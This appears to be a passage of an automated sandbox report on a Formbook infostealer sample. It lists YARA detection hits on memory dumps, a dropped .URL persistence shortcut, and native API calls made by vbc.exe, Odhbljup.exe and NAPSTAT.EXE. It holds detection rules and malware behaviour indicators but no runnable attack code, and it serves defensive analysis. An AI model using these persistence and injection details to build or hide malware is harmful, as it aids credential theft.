Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: Process Memory Space: Odhbljup.exe PID: 2192, type: MEMORYSTR	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\pujlbhdO.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 004042E4 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 004067E4 appears 61 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004038F8 appears 44 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004049F0 appears 38 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004042E4 appears 162 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 0040E2B4 appears 42 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 0040F5BC appears 44 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004067E4 appears 122 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 00404308 appears 46 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 02013F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0201373B appears 248 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01FCE2A8 appears 58 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01FCDF5C appears 124 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0203F970 appears 84 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450FCC NtdllDefWindowProc_A,	4_2_00450FCC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	4_2_0044629C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture,	4_2_00436A08
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	4_2_00451770
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	4_2_00451820
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042BE54 NtdllDefWindowProc_A,	4_2_0042BE54
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02128690 NtReadFile,	4_2_02128690
Source: C:\Users\Public\vbc.exe	Code function: 4_2_021287C0 NtAllocateVirtualMemory,	4_2_021287C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_021285E0 NtCreateFile,	4_2_021285E0
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00450FCC NtdllDefWindowProc_A,	7_2_00450FCC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	7_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00436A08 NtdllDefWindowProc_A,GetCapture,	7_2_00436A08
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	7_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	7_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0042BE54 NtdllDefWindowProc_A,	7_2_0042BE54
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00450FCC NtdllDefWindowProc_A,	10_2_00450FCC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	10_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00436A08 NtdllDefWindowProc_A,GetCapture,	10_2_00436A08
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	10_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	10_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042BE54 NtdllDefWindowProc_A,	10_2_0042BE54
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,	12_2_01FC00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC07AC NtCreateMutant,LdrInitializeThunk,	12_2_01FC07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF9F0 NtClose,LdrInitializeThunk,	12_2_01FBF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF900 NtReadFile,LdrInitializeThunk,	12_2_01FBF900
